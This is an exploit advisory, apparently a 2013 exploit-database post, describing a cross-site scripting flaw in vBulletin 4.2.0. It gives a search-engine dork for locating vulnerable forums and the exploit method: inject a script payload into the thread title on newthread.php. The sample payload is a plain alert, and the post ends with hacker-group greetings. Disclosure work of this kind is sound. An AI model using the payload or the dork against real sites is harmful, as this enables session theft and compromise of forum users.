facebook facebook twitter rss

Vbulletin 4.2.0 XSS Vulnerability

Author: IrIsT Security & Researcher Team , Published: 20-03-2013
################################################################################################
#
# Exploit Title : Vbulletin 4.2.0 XSS Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Sajjad13and11
#
# Home : http://irist.ir/en/forum.php
#
# Software Link : www.vbulletin.com
#
# Security Risk : High
#
# Version : 4.2.0
#
# Tested on : win7-xp,8,BT,win server 2008
#
# Dork : intext:"Powered by vBulletin® Version 4.2.0"
#
################################################################################################
#
# Expl0iTs :
#
# Go to newthread.php And Get XSS In Title.
# For Example Get : <script>alert("xss")</script> or ...
#
################################################################################################
#
# Greats : Amir - C0dex - Beni_Vanda - sajjad13and11 - Dead Zone - F@rid - TaK.FaNaR - jokers - Dr Koderz - silent
# and All Members In Www.IrIsT.Ir/forum
#
###############################################################################################

Like us on Facebook :